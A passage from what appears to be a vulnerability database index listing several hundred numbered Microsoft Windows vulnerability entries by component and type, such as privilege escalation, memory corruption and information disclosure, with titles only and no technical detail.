fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege 